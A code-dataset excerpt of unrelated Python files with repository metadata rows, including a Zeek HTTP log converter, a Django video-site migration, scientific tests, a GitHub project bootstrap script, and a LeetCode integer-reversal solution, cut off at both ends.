WHERE doctype='Configuracion ISR' \
AND (field like 'from%' OR field like 'to%') \
ORDER BY field", as_dict=1)
comment = """return frappe.db.sql("SELECT value \
FROM `tabSingles` \
WHERE doctype='Configuracion ISR'\
AND field='{0}'"
.format(field),as_dict=1)"""
| 26 | 51 | 0.716923 | 39 | 0.06 | 0 | 0 | 384 | 0.590769 | 0 | 0 | 419 | 0.644615 |
f1be0f593e7493f91a2f96246f4cf8a9df42b366 | 1,367 | py | Python | electrumsv_sdk/builtin_components/electrumsv_server/local_tools.py | electrumsv/electrumsv-sdk | 2d4b9474b2e2fc5518bba10684c5d5130ffb6328 | ["OML"] | 4 | 2020-07-06T12:13:14.000Z | 2021-07-29T12:45:27.000Z | electrumsv_sdk/builtin_components/electrumsv_server/local_tools.py | electrumsv/electrumsv-sdk | 2d4b9474b2e2fc5518bba10684c5d5130ffb6328 | ["OML"] | 62 | 2020-07-04T04:50:27.000Z | 2021-08-19T21:06:10.000Z | electrumsv_sdk/builtin_components/electrumsv_server/local_tools.py | electrumsv/electrumsv-sdk | 2d4b9474b2e2fc5518bba10684c5d5130ffb6328 | ["OML"] | 3 | 2021-01-21T09:22:45.000Z | 2021-06-12T10:16:03.000Z |
import logging
import typing
from electrumsv_sdk.utils import get_directory_name
COMPONENT_NAME = get_directory_name(__file__)
logger = logging.getLogger(COMPONENT_NAME)
if typing.TYPE_CHECKING:
from .electrumsv_server import Plugin
class LocalTools:
"""helper for operating on plugin-specific state (like source dir, port, datadir etc.)"""
def __init__(self, plugin: 'Plugin'):
self.plugin = plugin
self.cli_inputs = plugin.cli_inputs
self.logger = logging.getLogger(self.plugin.COMPONENT_NAME)
def get_network_choice(self) -> str:
network_options = [
self.cli_inputs.cli_extension_args['regtest'],
self.cli_inputs.cli_extension_args['testnet'],
self.cli_inputs.cli_extension_args['scaling_testnet'],
self.cli_inputs.cli_extension_args['main']
]
assert len([is_selected for is_selected in network_options if is_selected]) in {0, 1}, \
"can only select 1 network"
network_choice = "regtest"
if self.cli_inputs.cli_extension_args['testnet']:
network_choice = "testnet"
elif self.cli_inputs.cli_extension_args['scaling_testnet']:
network_choice = "scaling-testnet"
elif self.cli_inputs.cli_extension_args['main']:
network_choice = "main"
return network_choice
| 34.175 | 96 | 0.686906 | 1,122 | 0.820775 | 0 | 0 | 0 | 0 | 0 | 0 | 238 | 0.174104 |
f1be97cb28ba644933394a127fc92f299492f132 | 4,955 | py | Python | cluster/core/include/python/http_parser.py | JarryShaw/broapt | 5a6253af862cb618718d8fad69343a23ef2ac9e4 | ["BSD-3-Clause"] | 3 | 2020-04-25T08:47:55.000Z | 2020-11-04T11:18:21.000Z | cluster/core/include/python/http_parser.py | JarryShaw/broapt | 5a6253af862cb618718d8fad69343a23ef2ac9e4 | ["BSD-3-Clause"] | 11 | 2020-06-15T16:28:15.000Z | 2021-11-29T17:11:07.000Z | source/include/python/http_parser.py | JarryShaw/broapt | 5a6253af862cb618718d8fad69343a23ef2ac9e4 | ["BSD-3-Clause"] | 3 | 2019-07-24T02:41:37.000Z | 2021-12-06T09:38:58.000Z |
# -*- coding: utf-8 -*-
# pylint: disable=all
import base64
import binascii
import contextlib
import math
import os
import textwrap
import time
import urllib.parse
from const import LOGS_PATH
from logparser import parse
from utils import is_nan, print_file
# from utils import IPAddressJSONEncoder, is_nan, print_file
# today
DATE = time.strftime('%Y-%m-%d')
# log path
LOGS = os.path.join(LOGS_PATH, 'http')
os.makedirs(LOGS, exist_ok=True)
# http log
HTTP_LOG = os.path.join(LOGS_PATH, 'http', f'{DATE}.log')
# macros
SEPARATOR = '\t'
SET_SEPARATOR = ','
EMPTY_FIELD = '(empty)'
UNSET_FIELD = 'NoDef'
FIELDS = ('scrip', 'ad', 'ts', 'url', 'ref', 'ua', 'dstip', 'cookie', 'src_port', 'json', 'method', 'body')
TYPES = ('addr', 'string', 'time', 'string', 'string', 'string', 'addr', 'string', 'port', 'vector[string]', 'string', 'string')
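# The output mimics a Bro/Zeek-style log header (#separator, #fields, #types, #open, #close); the separator byte itself is written as escaped hex.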
def hexlify(string):
hex_string = binascii.hexlify(string.encode()).decode()
return ''.join(map(lambda s: f'\\x{s}', textwrap.wrap(hex_string, 2)))
def init(HTTP_LOG):
print_file(f'#separator {hexlify(SEPARATOR)}', file=HTTP_LOG)
print_file(f'#set_separator{SEPARATOR}{SET_SEPARATOR}', file=HTTP_LOG)
print_file(f'#empty_field{SEPARATOR}{EMPTY_FIELD}', file=HTTP_LOG)
print_file(f'#unset_field{SEPARATOR}{UNSET_FIELD}', file=HTTP_LOG)
print_file(f'#path{SEPARATOR}http', file=HTTP_LOG)
print_file(f'#open{SEPARATOR}{time.strftime("%Y-%m-%d-%H-%M-%S")}', file=HTTP_LOG)
print_file(f'#fields{SEPARATOR}{SEPARATOR.join(FIELDS)}', file=HTTP_LOG)
print_file(f'#types{SEPARATOR}{SEPARATOR.join(TYPES)}', file=HTTP_LOG)
def make_url(line):
host = line.get('host')
if is_nan(host):
host = str()
uri = line.get('uri')
if is_nan(uri):
uri = str()
url = urllib.parse.urljoin(host, uri)
port = int(line['id.resp_p'])
if port == 80:
base = 'http://%s' % line['id.resp_h']
else:
base = 'http://%s:%s' % (line['id.resp_h'], line['id.resp_p'])
return urllib.parse.urljoin(base, url)
def make_b64(data):
if is_nan(data):
return None
return base64.b64encode(data.encode()).decode()
def make_json(line):
client_headers = line.get('client_header_names')
if is_nan(client_headers):
client_headers = list()
server_headers = line.get('server_header_names')
if is_nan(server_headers):
server_headers = list()
headers = list()
headers.extend(filter(lambda header: not is_nan(header), client_headers))
headers.extend(filter(lambda header: not is_nan(header), server_headers))
return ','.join(filter(lambda header: len(header), headers))
def beautify(obj):
if obj is None:
return UNSET_FIELD
if isinstance(obj, str):
return obj or EMPTY_FIELD
if isinstance(obj, (set, list, tuple)):
return SET_SEPARATOR.join(obj) or EMPTY_FIELD
return str(obj) or EMPTY_FIELD
def generate(log_name):
global DATE, HTTP_LOG
date = time.strftime('%Y-%m-%d')
if date != DATE:
close()
DATE = date
HTTP_LOG = os.path.join(LOGS_PATH, 'http', f'{DATE}.log')
init(HTTP_LOG)
log_root = os.path.join(LOGS_PATH, log_name)
http_log = os.path.join(log_root, 'http.log')
if not os.path.isfile(http_log):
return
LOG_HTTP = parse(http_log)
for (index, line) in LOG_HTTP.context.iterrows():
# record = dict(
# srcip=line['id.orig_h'],
# ad=None,
# ts=math.floor((line['ts'] if LOG_HTTP.format == 'json' else line['ts'].timestamp()) * 1000),
# url=make_url(line),
# ref=make_b64(line.get('referrer')),
# ua=make_ua(line),
# dstip=line['id.resp_h'],
# cookie=make_cookie(line),
# src_port=int(line['id.orig_p']),
# # json=make_json(line),
# method=line['method'],
# body=line['post_body'],
# )
record = (
# scrip
line['id.orig_h'],
# ad
None,
# ts
math.floor((line['ts'] if LOG_HTTP.format == 'json' else line['ts'].timestamp()) * 1000),
# url
make_url(line),
# ref
make_b64(line.get('referrer')),
# ua
make_b64(line.get('user_agent')),
# dstip
line['id.resp_h'],
# cookie
make_b64(line.get('cookies')),
# src_port
int(line['id.orig_p']),
# json
make_json(line),
# method
line.get('method'),
# body
make_b64(line.get('post_body')),
)
# data = json.dumps(record, cls=IPAddressJSONEncoder)
data = '\t'.join(map(lambda obj: beautify(obj), record))
print_file(data, file=HTTP_LOG)
def close():
print_file(f'#close{SEPARATOR}{time.strftime("%Y-%m-%d-%H-%M-%S")}', file=HTTP_LOG)
| 30.030303 | 128 | 0.594147 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,582 | 0.319273 |
f1c021de79d124febfa8a831e976cd4dc12aeed9 | 1,647 | py | Python | src/compute_trust_values.py | johndpope/FacialRetargeting | 5fb0c1da6af6c3d59aef264f567bfa7a244d0764 | ["MIT"] | 21 | 2020-08-19T02:52:16.000Z | 2022-02-25T12:35:04.000Z | src/compute_trust_values.py | johndpope/FacialRetargeting | 5fb0c1da6af6c3d59aef264f567bfa7a244d0764 | ["MIT"] | 3 | 2020-10-16T07:11:25.000Z | 2021-06-30T10:26:04.000Z | src/compute_trust_values.py | johndpope/FacialRetargeting | 5fb0c1da6af6c3d59aef264f567bfa7a244d0764 | ["MIT"] | 7 | 2020-08-24T08:30:53.000Z | 2022-03-28T15:55:24.000Z |
import numpy as np
from src.compute_corr_coef import compute_corr_coef
from utils.plotting import plot_similarities
def compute_trust_values(dsk, do_plot=False):
"""
Compute trust values following formula 6
k:= number of blendshapes
n:= num_features (num_markers*3)
:param dsk: delta_sk vector (k, n)
:param do_plot: decide if we want to plot the between-correlation matrix
:return: trust values vector (k,)
"""
if len(np.shape(dsk)) != 2:
raise ValueError("[COMPUTE TRUST VALUE] dsk dimensions not supported ({}) instead of 2".format(len(np.shape(dsk))))
# compute between-blendshape correlation
ckl = compute_corr_coef(dsk, dsk)
ckl = np.maximum(ckl, np.zeros(np.shape(ckl)))
if do_plot:
plot_similarities(ckl, "Between blendshapes correlation", vmin=0, vmax=1)
# compute lower triangle
num_k = np.shape(ckl)[0]
low_trig = np.zeros(num_k)
for k in range(num_k):
val = 0
for l in range(k):
val += ckl[k, l]
low_trig[k] = val
max_low_trig = np.max(low_trig)
# compute trust values (formula 6)
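    # as implemented: tk[k] = 1 - low_trig[k] / max(low_trig), with low_trig[k] = sum over l < k of max(0, c_kl)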
tk = np.zeros(num_k)
for k in range(len(tk)):
tk[k] = 1 - low_trig[k]/max_low_trig
return tk
if __name__ == '__main__':
"""
test compute_trust_values function
run: python -m src.compute_trust_values
"""
np.random.seed(0)
from utils.re_order_delta import re_order_delta
# test compute trust values
sk = np.random.rand(6, 3) # (k, n)
sorted_sk = re_order_delta(sk)
tk = compute_trust_values(sorted_sk, do_plot=False)
print("tk")
print(tk)
| 26.564516 | 123 | 0.651488 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 629 | 0.381906 |
f1c16c5d4d00c03eee3d9db1e1fe2c9c3aca5189 | 2,042 | py | Python | test/core/test_constant.py | haikusw/jaqalpaq | d507e894cb897756a1e51c99582b736254995b4e | ["Apache-2.0"] | 8 | 2021-02-19T23:25:28.000Z | 2021-09-24T20:11:13.000Z | test/core/test_constant.py | haikusw/jaqalpaq | d507e894cb897756a1e51c99582b736254995b4e | ["Apache-2.0"] | null | null | null | test/core/test_constant.py | haikusw/jaqalpaq | d507e894cb897756a1e51c99582b736254995b4e | ["Apache-2.0"] | null | null | null |
import unittest
from jaqalpaq.core.parameter import ParamType
from jaqalpaq.core.constant import Constant
from . import randomize
from . import common
class ConstantTester(unittest.TestCase):
def test_valid_types(self):
"""Test that a Constant can only be created from valid types."""
valid_values = [
(randomize.random_float(), ParamType.FLOAT),
(randomize.random_integer(), ParamType.INT),
]
for value, kind in valid_values:
const, name, _ = common.make_random_constant(
value=value, return_params=True
)
self.assertEqual(kind, const.kind)
self.assertEqual(name, const.name)
# Note that we can also create a Constant from another Constant, but Jaqal
# currently cannot make use of this functionality.
reg = common.make_random_register()
qubit = common.choose_random_qubit_getitem(reg)
invalid_values = [None, reg, qubit]
for value in invalid_values:
with self.assertRaises(Exception):
Constant(randomize.random_identifier(), value)
def test_value(self):
"""Test that a constant yields the same value it was created with."""
const, _, value = common.make_random_constant(return_params=True)
common.assert_values_same(self, value, const.value)
def test_resolve_value(self):
"""Test that constants ignore the context given in resolve_value and
return their stored value."""
const = common.make_random_constant()
other_const = common.make_random_constant()
context = {const.name: other_const.value}
exp_value = const.value
act_value = const.resolve_value(context)
common.assert_values_same(self, exp_value, act_value)
def test_classical(self):
"""Test that all constants are appropriately labeled as classical."""
self.assertTrue(common.make_random_constant().classical)
if __name__ == "__main__":
unittest.main()
| 37.127273 | 82 | 0.669931 | 1,838 | 0.900098 | 0 | 0 | 0 | 0 | 0 | 0 | 442 | 0.216454 |
f1c26fda7f69a42db47f3f5783c055c679831e9b | 8,035 | py | Python | src/richard/videos/migrations/0001_initial.py | pyvideo/richard | 894f5380e07d7e66453fe730891a21aca32d8edb | ["Apache-2.0"] | 51 | 2015-01-24T07:53:56.000Z | 2020-08-30T12:19:39.000Z | src/richard/videos/migrations/0001_initial.py | westurner/richard | 894f5380e07d7e66453fe730891a21aca32d8edb | ["Apache-2.0"] | 34 | 2015-02-23T11:15:00.000Z | 2016-01-04T11:25:42.000Z | src/richard/videos/migrations/0001_initial.py | westurner/richard | 894f5380e07d7e66453fe730891a21aca32d8edb | ["Apache-2.0"] | 16 | 2015-03-20T17:36:09.000Z | 2022-01-07T01:04:17.000Z |
# -*- coding: utf-8 -*-
# richard -- video index system
# Copyright (C) 2012, 2013, 2014, 2015 richard contributors. See AUTHORS.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(help_text='The complete title for the category. e.g. PyCon 2010', max_length=255)),
('description', models.TextField(default='', help_text='Use Markdown', blank=True)),
('url', models.URLField(default='', help_text='URL for the category. e.g. If this category was a conference, this would be the url for the conference web-site.', blank=True)),
('start_date', models.DateField(help_text='If the category was an event, then this is the start date for the event.', null=True, blank=True)),
('whiteboard', models.CharField(default='', help_text='Editor notes for this category.', max_length=255, blank=True)),
('slug', models.SlugField(unique=True)),
('added', models.DateTimeField(auto_now_add=True, null=True)),
],
options={
'ordering': ['title'],
'verbose_name': 'category',
'verbose_name_plural': 'categories',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Language',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('iso639_1', models.CharField(max_length=3)),
('name', models.CharField(max_length=20)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='RelatedUrl',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('url', models.URLField(max_length=255)),
('description', models.CharField(default='', max_length=255, blank=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Speaker',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
('slug', models.SlugField(unique=True)),
],
options={
'ordering': ['name'],
'verbose_name': 'speaker',
'verbose_name_plural': 'speakers',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('tag', models.CharField(max_length=30)),
],
options={
'ordering': ['tag'],
'verbose_name': 'tag',
'verbose_name_plural': 'tags',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Video',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('state', models.IntegerField(default=2, choices=[(1, 'Live'), (2, 'Draft')])),
('title', models.CharField(max_length=255)),
('summary', models.TextField(default='', help_text='Use Markdown', blank=True)),
('description', models.TextField(default='', help_text='Use Markdown', blank=True)),
('quality_notes', models.TextField(default='', blank=True)),
('copyright_text', models.TextField(blank=True)),
('embed', models.TextField(blank=True)),
('thumbnail_url', models.URLField(max_length=255, null=True, blank=True)),
('duration', models.IntegerField(help_text=b'In seconds', null=True, blank=True)),
('video_ogv_length', models.IntegerField(null=True, blank=True)),
('video_ogv_url', models.URLField(max_length=255, null=True, blank=True)),
('video_ogv_download_only', models.BooleanField(default=False)),
('video_mp4_length', models.IntegerField(null=True, blank=True)),
('video_mp4_url', models.URLField(max_length=255, null=True, blank=True)),
('video_mp4_download_only', models.BooleanField(default=False)),
('video_webm_length', models.IntegerField(null=True, blank=True)),
('video_webm_url', models.URLField(max_length=255, null=True, blank=True)),
('video_webm_download_only', models.BooleanField(default=False)),
('video_flv_length', models.IntegerField(null=True, blank=True)),
('video_flv_url', models.URLField(max_length=255, null=True, blank=True)),
('video_flv_download_only', models.BooleanField(default=False)),
('source_url', models.URLField(max_length=255, null=True, blank=True)),
('whiteboard', models.CharField(default='', max_length=255, blank=True)),
('recorded', models.DateField(null=True, blank=True)),
('added', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('slug', models.SlugField(unique=True)),
('category', models.ForeignKey(related_name='videos', to='videos.Category')),
('language', models.ForeignKey(to='videos.Language', null=True)),
('speakers', models.ManyToManyField(related_name='videos', to='videos.Speaker', blank=True)),
('tags', models.ManyToManyField(related_name='videos', to='videos.Tag', blank=True)),
],
options={
'ordering': ['-recorded', 'title'],
'get_latest_by': 'recorded',
'verbose_name': 'video',
'verbose_name_plural': 'videos',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='VideoUrlStatus',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('check_date', models.DateTimeField()),
('status_code', models.IntegerField()),
('status_message', models.CharField(max_length=255, blank=True)),
('url', models.URLField(max_length=255)),
('video', models.ForeignKey(to='videos.Video')),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='relatedurl',
name='video',
field=models.ForeignKey(related_name='related_urls', to='videos.Video'),
preserve_default=True,
),
]
| 49.598765 | 191 | 0.571873 | 7,161 | 0.891226 | 0 | 0 | 0 | 0 | 0 | 0 | 2,303 | 0.286621 |
f1c41c955777189a3b733180afda82b9ed458a7c | 1,399 | py | Python | descwl_shear_sims/tests/test_artifacts.py | LSSTDESC/descwl_shear_sims | 1c696518104b7f301dd6c69571239431c6232110 | ["BSD-3-Clause"] | null | null | null | descwl_shear_sims/tests/test_artifacts.py | LSSTDESC/descwl_shear_sims | 1c696518104b7f301dd6c69571239431c6232110 | ["BSD-3-Clause"] | 11 | 2019-12-10T23:30:27.000Z | 2019-12-24T13:59:32.000Z | descwl_shear_sims/tests/test_artifacts.py | LSSTDESC/wl-shear-testing-sims | 6e4a0baa6f664b5bc52b08b55614eaa58c8b0748 | ["BSD-3-Clause"] | null | null | null |
"""
copy-paste from my (beckermr) personal code here
https://github.com/beckermr/metadetect-coadding-sims
"""
import numpy as np
import galsim
from descwl_shear_sims.masking import get_bmask_and_set_image
from descwl_shear_sims.artifacts import (
generate_bad_columns,
generate_cosmic_rays,
)
def test_basic_mask():
image = galsim.ImageD(np.zeros((100, 100)))
bmask = get_bmask_and_set_image(
image=image, rng=None, cosmic_rays=False, bad_columns=False,
)
assert np.all(bmask.array == 0)
def test_generate_cosmic_rays_smoke():
rng = np.random.RandomState(seed=10)
msk = generate_cosmic_rays(shape=(64, 64), rng=rng)
assert np.any(msk)
def test_generate_cosmic_rays_seed():
rng = np.random.RandomState(seed=10)
msk1 = generate_cosmic_rays(shape=(64, 64), rng=rng)
rng = np.random.RandomState(seed=10)
msk2 = generate_cosmic_rays(shape=(64, 64), rng=rng)
assert np.array_equal(msk1, msk2)
def test_generate_bad_columns_smoke():
rng = np.random.RandomState(seed=10)
msk = generate_bad_columns(shape=(64, 64), rng=rng)
assert np.any(msk)
def test_generate_bad_columns_seed():
rng = np.random.RandomState(seed=10)
msk1 = generate_bad_columns(shape=(64, 64), rng=rng)
rng = np.random.RandomState(seed=10)
msk2 = generate_bad_columns(shape=(64, 64), rng=rng)
assert np.array_equal(msk1, msk2)
| 25.436364 | 68 | 0.719085 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 109 | 0.077913 |
f1c44279c1c78e6d3ae1d50d41837fb4c6fd7df0 | 2,270 | py | Python | stylobate_mgmt/commands/init.py | digitaltembo/stylobate-mgmt | 26483aab27d2496dcbd71d7de2f5780bc43a959e | ["MIT"] | null | null | null | stylobate_mgmt/commands/init.py | digitaltembo/stylobate-mgmt | 26483aab27d2496dcbd71d7de2f5780bc43a959e | ["MIT"] | null | null | null | stylobate_mgmt/commands/init.py | digitaltembo/stylobate-mgmt | 26483aab27d2496dcbd71d7de2f5780bc43a959e | ["MIT"] | null | null | null |
from getpass import getpass
import os
from .utils import Command
from .db import DB
class Init(Command):
name = 'init'
description = "Initializes a new Stylobate project, forking the original"
def add_args(self, parser):
parser.add_argument(
'name',
type=str,
help='The name of the stylobate project'
)
parser.add_argument(
'directory',
type=str,
nargs='?',
help='Path to the directory that the project will be placed in'
)
def main(self, args):
parent_dir = args.directory if args.directory else os.getcwd()
name = args.name
self.initialize_project(args.name, parent_dir)
def initialize_project(self, project_name, parent_dir):
self.print('Initializing new project {} in directory {}'.format(project_name, parent_dir))
self.execute('gh repo create -d "Stylobate-based Web Application" {}'.format(project_name), abs_dir=parent_dir)
proj_dir = os.path.join(parent_dir, project_name)
proj_ctxt = self.context.new_context(proj_dir)
if not os.path.isdir(proj_dir):
# So they shouuuld say yes while creating the repo to make this git directory locally, but they may not
proj_ctxt.execute('mkdir {}'.format(project_name))
proj_ctxt.execute('git init')
else:
# GitHub CLI clones the remote repo over HTTP :(
proj_ctxt.execute('git remote remove origin')
username = self.input("Username for 'https://github.com'")
proj_ctxt.execute('git remote add origin [email protected]:{}/{}.git'.format(username, project_name))
proj_ctxt.execute('git remote add upstream [email protected]:digitaltembo/stylobate.git')
proj_ctxt.execute('git pull upstream master')
proj_ctxt.execute('git push -u origin master')
proj_ctxt.execute('python -m venv venv', 'backend')
proj_ctxt.execute('venv/bin/pip install -r requirements.txt', 'backend')
proj_ctxt.execute('yarn install', 'frontend')
username = self.input("Superuser email")
password = self.input("Superuser password")
DB(proj_ctxt).add_superuser(username, password)
| 33.382353 | 119 | 0.644934 | 2,178 | 0.959471 | 0 | 0 | 0 | 0 | 0 | 0 | 821 | 0.361674 |
f1c47788397390c41f153d775e370f60b472f99d | 628 | py | Python | leetcode_submissions/7.reverse-integer.18198620.ac.py | aenon/online_judge | bff3991519cd4f2d80dea9b17680dbc5d4c44b9b | ["MIT"] | null | null | null | leetcode_submissions/7.reverse-integer.18198620.ac.py | aenon/online_judge | bff3991519cd4f2d80dea9b17680dbc5d4c44b9b | ["MIT"] | null | null | null | leetcode_submissions/7.reverse-integer.18198620.ac.py | aenon/online_judge | bff3991519cd4f2d80dea9b17680dbc5d4c44b9b | ["MIT"] | 1 | 2015-01-10T16:02:43.000Z | 2015-01-10T16:02:43.000Z |
#!/usr/bin/env python
# Reverse Integer https://oj.leetcode.com/problems/reverse-integer/
# Reverse digits of an integer.
# Example1: x = 123, return 321
# Example2: x = -123, return -321
#Math
# Xilin SUN
# Dec 7 2014
class Solution:
# @return an integer
def reverse(self, x):
if x > 2147483646:
return 0
if x < -2147483647:
return 0
isPositive = True
if x < 0:
isPositive = False
x = -x
rev = 0
while x != 0:
rev = 10 * rev + x % 10
x = x / 10
if rev > 2147483646:
return 0
if rev < -2147483647:
return 0
if isPositive:
return rev
return -rev
| 19.030303 | 68 | 0.593949 | 395 | 0.628981 | 0 | 0 | 0 | 0 | 0 | 0 | 240 | 0.382166 |
f1c529b5976d0a2cdf007169fc8e0ee8525206e1 | 1,400 | py | Python | src/z3c/configurator/tests.py | zopefoundation/z3c.configurator | 390416d2fa61ddf97c28e6af32eae3660bb725e2 | ["ZPL-2.1"] | null | null | null | src/z3c/configurator/tests.py | zopefoundation/z3c.configurator | 390416d2fa61ddf97c28e6af32eae3660bb725e2 | ["ZPL-2.1"] | 1 | 2021-01-08T15:34:08.000Z | 2021-01-08T15:34:08.000Z | src/z3c/configurator/tests.py | zopefoundation/z3c.configurator | 390416d2fa61ddf97c28e6af32eae3660bb725e2 | ["ZPL-2.1"] | 1 | 2015-04-03T05:49:32.000Z | 2015-04-03T05:49:32.000Z |
##############################################################################
#
# Copyright (c) 2005 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
#############################################################################
"""Configurator Test Setup"""
import re
import doctest
from zope.component import testing
from zope.testing.renormalizing import RENormalizing
def setUp(test):
testing.setUp(test)
def tearDown(test):
testing.tearDown()
def test_suite():
checker = RENormalizing((
(re.compile("u'(.*?)'"), "'\\1'"),
(re.compile("<type 'unicode'>"), "<class 'str'>"),
(re.compile("zope.schema._bootstrapinterfaces.RequiredMissing"),
"RequiredMissing"),
(re.compile("zope.schema._bootstrapinterfaces.WrongType"),
"WrongType"),
))
return doctest.DocFileSuite(
'README.txt',
setUp=setUp, tearDown=tearDown, checker=checker,
optionflags=doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS)
| 31.818182 | 78 | 0.620714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 835 | 0.596429 |
f1c67bf4245b574bcd2ed4dfcba7d08e3e6e8419 | 174 | py | Python | example.py | LucasHazardous/SkinReaper | c910cebe2aed3dd8e442515e4415f3e253e5a4ac | ["MIT"] | null | null | null | example.py | LucasHazardous/SkinReaper | c910cebe2aed3dd8e442515e4415f3e253e5a4ac | ["MIT"] | null | null | null | example.py | LucasHazardous/SkinReaper | c910cebe2aed3dd8e442515e4415f3e253e5a4ac | ["MIT"] | null | null | null |
from skin_reaper import SkinReaper
if __name__ == "__main__":
r = SkinReaper()
data = r.harvestLinks(5)
r.setSkinPreview()
r.collectRandom(data)
r.kill()
| 21.75 | 34 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | 0.057471 |
f1c6b2f9d9acd98dcef1131f691572e33395120a | 528 | py | Python | time_to_speech.py | besi/stereopi | c03a1ae990af67dde4e2cd832a20b49d697de230 | ["MIT"] | 2 | 2020-02-18T18:10:50.000Z | 2020-08-04T21:00:29.000Z | time_to_speech.py | besi/stereopi | c03a1ae990af67dde4e2cd832a20b49d697de230 | ["MIT"] | 4 | 2020-02-19T10:46:02.000Z | 2021-01-09T18:52:45.000Z | time_to_speech.py | besi/stereopi | c03a1ae990af67dde4e2cd832a20b49d697de230 | ["MIT"] | null | null | null |
# Credits go to <http://codereview.stackexchange.com/q/37522>
import random
import time
def current_time():
'''Returns a tuple containing (hour, minute) for current local time.'''
local_time = time.localtime(time.time())
return (local_time.tm_hour, local_time.tm_min)
(hour, minute) = current_time()
def ishtime(hours, minutes):
hours = hours % 24
if minutes == 0:
return(str(hours) + ' sharp')
return(str(hours) + ' . . . and ' + str(minutes) + ' minutes')
print(ishtime(hour, minute))
| 22 | 75 | 0.657197 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 163 | 0.308712 |
f1c6e01e5913573733f519b9c5d164e6fed7195b
| 575 |
py
|
Python
|
setup.py
|
ckuzma/solar-viability-tester
|
c34d03d1914374279ca269ab402eb5074f7555a6
|
[
"MIT"
] | null | null | null |
setup.py
|
ckuzma/solar-viability-tester
|
c34d03d1914374279ca269ab402eb5074f7555a6
|
[
"MIT"
] | 2 |
2017-04-03T13:59:00.000Z
|
2017-04-06T04:57:50.000Z
|
setup.py
|
ckuzma/solar-viability-tester
|
c34d03d1914374279ca269ab402eb5074f7555a6
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='solar-viability-tester',
version='1.0.0',
description='Solar viability tester utilizing the AT&T IoT Starter Kit and PubNub.',
long_description=long_description,
url='https://github.com/ckuzma/solar-viability-tester',
license='Apache-2.0'
)
| 30.263158 | 89 | 0.707826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 230 | 0.4 |
f1c78560c5fc55f8dc09c8791ab3fa9dcc1ccd67
| 31,028 |
py
|
Python
|
framework/framework.py
|
wbqhb/SEPC
|
1a5e03b70984b759b615424dc06f530d5de00f51
|
[
"MIT"
] | null | null | null |
framework/framework.py
|
wbqhb/SEPC
|
1a5e03b70984b759b615424dc06f530d5de00f51
|
[
"MIT"
] | null | null | null |
framework/framework.py
|
wbqhb/SEPC
|
1a5e03b70984b759b615424dc06f530d5de00f51
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# @Time : 2021/5/4 3:05 PM
# @Author : godwaitup
# @FileName: framework.py
# original framework for joint extraction.
import torch.optim as optim
from torch import nn
import os
import data_loader
import torch.nn.functional as F
import numpy as np
import json
from functools import partial
from data_loader import cmed_collate_fn
import torch
def _to_sub(triple_list, head_only=False, lang='ENGLISH'):
ret = set()
for triple in triple_list:
        if lang == 'CHINESE':
triple = (triple[0].replace('$', ' ').lower(), triple[1], triple[2].replace('$', ' ').lower())
if head_only:
ret.add(triple[0].split(" ")[0])
else:
ret.add(triple[0])
return ret
def _to_obj(triple_list, head_only=False, lang='ENGLISH'):
ret = set()
for triple in triple_list:
        if lang == 'CHINESE':
triple = (triple[0].replace('$', ' ').lower(), triple[1], triple[2].replace('$', ' ').lower())
if head_only:
ret.add(triple[2].split(" ")[0])
else:
ret.add(triple[2])
return ret
def _to_ep(triple_list, head_only=False, lang='ENGLISH'):
ret = set()
for triple in triple_list:
        if lang == 'CHINESE':
triple = (triple[0].replace('$', ' ').lower(), triple[1], triple[2].replace('$', ' ').lower())
if head_only:
_h = triple[0].split(" ")
_t = triple[2].split(" ")
